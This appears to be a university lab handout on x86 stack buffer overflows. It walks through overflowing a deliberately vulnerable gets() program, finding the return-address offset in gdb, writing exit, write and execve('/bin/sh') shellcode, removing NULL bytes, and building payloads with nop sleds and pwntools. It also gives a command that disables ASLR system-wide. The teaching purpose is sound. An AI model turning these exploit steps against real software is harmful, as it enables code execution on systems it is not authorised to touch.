We will use this lab archive throughout the lab.
Please download the lab archive and then unpack it using the commands below:
student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-06.tar.gz
student@mjolnir:~$ tar xzf lab-06.tar.gz
After unpacking, we get the lab-06/ folder that we will use for the lab:
student@mjolnir:~$ cd lab-06/
student@mjolnir:~/lab-06$ ls
bin_to_hex.sh  Makefile  shellcode_exit.S  skel_pwn.py  test_shellcode.c  vuln2.asm  vuln.asm
Once an attacker manages to overwrite the return address, the usual next step is to divert the execution flow to their advantage. A stable foothold inside the exploited system can be gained by spawning a shell from the vulnerable application.
This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work:
Since the injected code's outcome is commonly that of spawning a shell, the name “shellcode” is used to describe a wide array of such code snippets. A “shellcode” could also create a new socket, or read the contents of a file and print it to the standard output.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Note that this has a system-wide effect. To launch a single executable with ASLR disabled, use:
setarch $(uname -m) -R <executable>
(You can pass a shell as the executable and all processes launched by that shell will also have ASLR disabled.)
Let's write a simple shellcode which performs
exit(1337);
We have the following blatantly vulnerable program:
extern gets
extern printf

section .data
formatstr: db "Enjoy your leak: %p",0xa,0

section .text
global main
main:
    push ebp
    mov ebp, esp
    sub esp, 64
    lea ebx, [ebp - 64]
    push ebx
    push formatstr
    call printf
    push ebx
    call gets
    add esp, 4
    leave
    ret
You may already see what the vulnerability consists of.
We are going to use some of PEDA's features to our advantage:
gdb-peda$ pattc 100 # Generate a De Bruijn pattern of length 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /vuln
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EBX: 0xfff088f8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
ECX: 0xf77495a0 --> 0xfbad2288
EDX: 0xf774a87c --> 0x0
ESI: 0xf7749000 --> 0x1aedb0
EDI: 0xf7749000 --> 0x1aedb0
EBP: 0x41644141 ('AAdA')
ESP: 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x41413341 ('A3AA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41413341
[------------------------------------stack-------------------------------------]
0000| 0xfff08940 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xfff08944 ("AA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xfff08948 ("AJAAfAA5AAKAAgAA6AAL")
0012| 0xfff0894c ("fAA5AAKAAgAA6AAL")
0016| 0xfff08950 ("AAKAAgAA6AAL")
0020| 0xfff08954 ("AgAA6AAL")
0024| 0xfff08958 ("6AAL")
0028| 0xfff0895c --> 0xf779ac00 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41413341 in ?? ()
gdb-peda$ patto A3AA # Find offset within pattern
A3AA found at offset: 68
Notice that the program crashed. We can quickly determine that the program tried to return to 0x41413341, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group “A3AA” found at offset 68 in the pattern. This offset is where the return address is situated relative to our input.
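The offset lookup can also be reproduced by hand. The following is a minimal Python 3 sketch, assuming the pattern string and the faulting EIP value shown in the session above; the variable names are illustrative only.

```python
import struct

# Pattern printed by `pattc 100` in the gdb session.
pattern = b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL"

# x86 is little-endian: the value in EIP is the 4 input bytes read in reverse order.
eip = 0x41413341
needle = struct.pack("<I", eip)

# Position of those 4 bytes inside the pattern = offset of the saved return address.
offset = pattern.find(needle)
print(needle, offset)
```

The same lookup applied to the value in EBP (0x41644141) gives the offset of the saved frame pointer, which sits 4 bytes before the return address.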
Now that we know the saved return address sits 68 bytes from the beginning of the buffer (that is, from the start of our input), we can make the program jump to a destination of our choice. Let's try 'BBBB', or 0x42424242, as our return address, preceded by 68 'A's.
We can construct this test sequence using python from the command line:
python -c "print 'A'*68 + 'BBBB'"
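The one-liner above relies on Python 2's print statement. On a system that only ships Python 3, a roughly equivalent sketch is shown below; it assumes the 68-byte offset found earlier, and the names OFFSET and payload are illustrative.

```python
OFFSET = 68                          # bytes from the start of the buffer to the saved return address

# 68 filler bytes, then the 4 bytes that will be loaded into EIP (0x42424242).
payload = b"A" * OFFSET + b"BBBB"

# Every byte here is printable ASCII, so decoding for print() is safe.
print(payload.decode("ascii"))
```

For payloads that contain non-printable bytes, writing the bytes object to a file opened in binary mode is the safer route, since text output in Python 3 re-encodes bytes above 0x7f.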
We can now rerun the binary under gdb and see what happens.
gdb-peda$ r
Starting program: /vuln
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
EBX: 0xffb0e678 ('A' <repeats 68 times>, "BBBB")
ECX: 0xf77905a0 --> 0xfbad2288
EDX: 0xf779187c --> 0x0
ESI: 0xf7790000 --> 0x1aedb0
EDI: 0xf7790000 --> 0x1aedb0
EBP: 0x41414141 ('AAAA')
ESP: 0xffb0e6c0 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffb0e6c0 --> 0x0
0004| 0xffb0e6c4 --> 0xffb0e754 --> 0xffb1018e ("/vuln")
0008| 0xffb0e6c8 --> 0xffb0e75c --> 0xffb101c0 ("LC_PAPER=ro_RO.UTF-8")
0012| 0xffb0e6cc --> 0x0
0016| 0xffb0e6d0 --> 0x0
0020| 0xffb0e6d4 --> 0x0
0024| 0xffb0e6d8 --> 0xf7790000 --> 0x1aedb0
0028| 0xffb0e6dc --> 0xf77e1c04 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
Excellent!
Shellcode is typically written in assembly, because it must be small enough to fit in the available buffer and the author needs control over every byte that is emitted.
How do we start writing our exit shellcode? First, we need to know how system calls are performed on our target platform (x86 in our case).
Each system call has a specific number which identifies it. This number must be stored in EAX. Next, the arguments of the system call are placed in EBX, ECX, EDX, ESI, EDI, in this order. A special software interrupt is used to issue the actual system call, int 0x80.
Consult the Linux x86 (i386) system call ABI for the complete list of system call numbers and their arguments.
We need to place 1 (exit's system call number) in EAX, and the value of exit's single argument in EBX.
Our shellcode will look as follows:
BITS 32
mov eax, 1
mov ebx, 1337
int 0x80
But we can't pass it as assembly instructions to the application; we need to assemble it into binary as well.
nasm shellcode_exit.S -o shell.bin
We now need this binary code as a stream of hex values in order to use python/perl/echo to feed it into the application.
hexdump -v -e '1/1 "\\"' -e '1/1 "x%02x"' shell.bin ; echo
or
xxd -c 1 -p shell.bin | awk '{ print "\\x" $0 }' | paste -sd ""
or just use the conveniently supplied bin_to_hex.sh script.
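The same conversion can be sketched in Python 3. The helper name to_hex_escapes is hypothetical, and the sketch only assumes that the goal is the \xNN form produced by the commands above; it is not a transcription of bin_to_hex.sh.

```python
def to_hex_escapes(data: bytes) -> str:
    """Return the bytes as a string of backslash-x escapes, one per byte."""
    return "".join("\\x{:02x}".format(b) for b in data)

# Example input: the two bytes that encode `int 0x80`.
print(to_hex_escapes(b"\xcd\x80"))
```

To convert the assembled file, read it in binary mode first, for example with open("shell.bin", "rb").read(), and pass the result to the helper.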
In order to test your shellcode, you can use xxd to export the shellcode as a C array and test it using the test_shellcode program in the archive.
xxd -i shell.bin > shellcode
By running test_shellcode under strace, you can check whether the system call was actually performed, and with which arguments. If all else fails, fall back to gdb.
strace -e exit ./test_shellcode
strace: [ Process PID=5155 runs in 32 bit mode. ]
exit(1337) = ?
+++ exited with 57 +++
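Keep in mind when checking the result (for example with echo $? in the shell) that only the low 8 bits of the argument passed to exit reach the parent process. A short Python 3 sketch of that arithmetic, with illustrative variable names:

```python
requested = 1337               # value placed in EBX for the exit system call
reported = requested & 0xFF    # the parent only sees the low 8 bits of the status

print(hex(requested), reported)
```

So a shellcode that calls exit(1337) is reported as having exited with status 57, since 1337 is 0x539 and 0x39 is 57.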
Use the supplied bin_to_hex.sh script to convert a binary file to a hex representation. You can also take a final look at the shellcode using objdump:
objdump -D -b binary -M intel -m i386 shell.bin

shell.bin:     file format binary

Disassembly of section .data:

00000000 <.data>:
   0:   b8 01 00 00 00          mov    eax,0x1
   5:   bb 39 05 00 00          mov    ebx,0x539
   a:   cd 80                   int    0x80
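To see where each byte in the disassembly comes from, the encoding can be rebuilt by hand. The Python 3 sketch below assumes only the three instructions listed above: each mov is a one-byte opcode followed by a 32-bit little-endian immediate.

```python
import struct

shellcode = (
    b"\xb8" + struct.pack("<I", 1)       # mov eax, 1      (opcode b8, then imm32)
    + b"\xbb" + struct.pack("<I", 1337)  # mov ebx, 0x539  (opcode bb, then imm32)
    + b"\xcd\x80"                        # int 0x80
)

print(shellcode.hex(), len(shellcode))
```

The padding of each immediate to four bytes is what introduces the 0x00 bytes in the shellcode.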
First, let's determine the length of our shellcode:
python -c "print len('$(./bin_to_hex.sh shell.bin)')"
12
Next, we'll need to fill our buffer up to 68 characters until the saved return address is reached on the stack.
python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12)"
Now we need to find the beginning of our buffer on the stack in order to return to it. Repeat the experiment and set a breakpoint at the leave instruction. Write down the address of the beginning of your buffer on the stack, because that's where the shellcode will end up.
gdb-peda$ b *0x8048422
Breakpoint 1 at 0x8048422
gdb-peda$ r
Starting program: /vuln
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
[----------------------------------registers-----------------------------------]
EAX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EBX: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
ECX: 0xf7fac5a0 --> 0xfbad2288
EDX: 0xf7fad87c --> 0x0
ESI: 0xf7fac000 --> 0x1aedb0
EDI: 0xf7fac000 --> 0x1aedb0
EBP: 0xffffcef8 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
ESP: 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
EIP: 0x8048422 (<main+18>: leave)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048419 <main+9>: push ebx
   0x804841a <main+10>: call 0x80482e0 <gets@plt>
   0x804841f <main+15>: add esp,0x4
=> 0x8048422 <main+18>: leave
   0x8048423 <main+19>: ret
   0x8048424 <main+20>: xchg ax,ax
   0x8048426 <main+22>: xchg ax,ax
   0x8048428 <main+24>: xchg ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffceb8 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0004| 0xffffcebc ("AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0xffffcec0 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0012| 0xffffcec4 ("$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0xffffcec8 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0020| 0xffffcecc ("A-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0xffffced0 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0028| 0xffffced4 ("AA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x08048422 in main ()
python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(68-12) + '\xb8\xce\xff\xff'" > payload
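The command above depends on Python 2, where print emits raw bytes. Under Python 3 the payload is better assembled as a bytes object. The sketch below assumes the 12-byte exit shellcode, the 68-byte offset and the buffer address 0xffffceb8 from the gdb session; the address will differ on your machine, and the constant names are illustrative.

```python
import struct

shellcode = bytes.fromhex("b801000000bb39050000cd80")   # exit shellcode, 12 bytes
OFFSET = 68                    # buffer start -> saved return address
BUF_ADDR = 0xffffceb8          # buffer address observed in gdb (environment-specific)

padding = b"A" * (OFFSET - len(shellcode))
# struct.pack("<I", ...) produces the little-endian byte order x86 expects.
payload = shellcode + padding + struct.pack("<I", BUF_ADDR)

print(payload.hex())
```

Writing payload plus a trailing newline to a file opened with mode "wb" gives the same payload file that the shell one-liner produces.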
Now test the payload in gdb! Break at ret and see the control flow continuing on the stack and executing exit.
Then try running the experiment outside of gdb. Does it still work? Why or why not?
In order to circumvent frustration, we've leaked the stack address of the buffer in the binary.
Sometimes, you won't have access to the binary and only have a leaked address of some description. You can add this instruction in your shellcode
jmp 0x0
and vary the overwritten return address. If the program stops responding, then it means that it has reached your shellcode.
Stack addresses aren't always stable. To work around this, buffer space permitting, you can inject a large number of nop (no operation) instructions before the actual shellcode. That way, if you return to any of the injected nop instructions, execution slides forward until it reaches your shellcode.
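A nop sled for the vulnerable program in this lab could be laid out as in the Python 3 sketch below. It assumes the 12-byte exit shellcode, the 68-byte offset and a buffer address of 0xffffceb8 taken from gdb; all names are illustrative, and the address must be replaced with the one observed or leaked on your system.

```python
import struct

NOP = b"\x90"                                          # x86 `nop` opcode
shellcode = bytes.fromhex("b801000000bb39050000cd80")  # exit shellcode, 12 bytes
OFFSET = 68                                            # buffer start -> saved return address
BUF_ADDR = 0xffffceb8                                  # assumed buffer address

sled = NOP * (OFFSET - len(shellcode))   # fill everything before the shellcode with nops
target = BUF_ADDR + len(sled) // 2       # aim at the middle of the sled
payload = sled + shellcode + struct.pack("<I", target)

print(len(sled), hex(target))
```

Aiming at the middle of the sled tolerates the buffer moving by up to half the sled length in either direction. With only 56 bytes of sled, that margin is small; larger buffers allow proportionally more drift.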
Your exploit may spawn a shell, and yet it shuts off instantly. That's because the shell's standard input reaches end-of-file as soon as the payload has been consumed, so the shell exits right away. A workaround is to keep standard input open by concatenating it after the payload, as follows:
cat payload - | ./vuln
In this way, after the shell spawns, you can interact with it.
Using the same vulnerable binary, write a shellcode which performs the following:
write(1, "Hello World!\n", 13);
Again, inspect the Linux x86 ABI.
    jmp string
start:
    pop ecx       ; pop address of `hello` variable in ecx
    [...]
string:
    call start    ; jump/trampoline back to start while storing the address of `hello` on the stack
hello: db "Hello World", 0
The call instruction will push the address of the next “instruction” (in this case, our string), onto the stack.
Now for the real challenge: write a shellcode which actually spawns a shell. The equivalent C call is the following:
execve('/bin/sh', ['/bin/sh'], 0);
Here ['/bin/sh'] denotes the address of a NULL-terminated array of pointers whose first element is the address of the string '/bin/sh'.
Inspect the code of vuln2.asm. What changed? How is your input passed?
Some functions, such as strcpy, sprintf and strcat stop whenever a NULL byte is reached. If you inspect your previous shellcodes using xxd, you will notice that they have plenty of NULL ('0x00') bytes in them, so your lifelong dream for world domination will be cut short whenever these functions are used.
However, there's more than one way to write assembly. Convert your previous shellcode into one that contains no NULLs and use it to exploit vuln2.
mov <reg>, 0      <->  xor <reg>, <reg>
mov <reg>, value  <->  push value, pop <reg>
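As an illustration of these substitutions, the Python 3 sketch below compares the exit shellcode from earlier with one possible NULL-free rewrite. The encodings were assembled by hand for this example and should be verified with nasm and objdump before use; the variable names are illustrative.

```python
# Original exit shellcode: the 32-bit immediates carry 0x00 padding bytes.
original = bytes.fromhex("b801000000" "bb39050000" "cd80")

# One possible rewrite that avoids 0x00 bytes altogether.
null_free = bytes.fromhex(
    "31c0"      # xor eax, eax
    "40"        # inc eax         -> eax = 1
    "31db"      # xor ebx, ebx
    "66bb3905"  # mov bx, 0x539   -> ebx = 1337 (16-bit immediate, no padding)
    "cd80"      # int 0x80
)

print(original.count(b"\x00"), null_free.count(b"\x00"), len(null_free))
```

The same check (searching the assembled bytes for 0x00) is a quick way to validate any shellcode before feeding it to vuln2.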
Lastly, let's use pwntools to do most of the work for us and exploit vuln once more. Fill in the values in skel_pwn.py and run the script.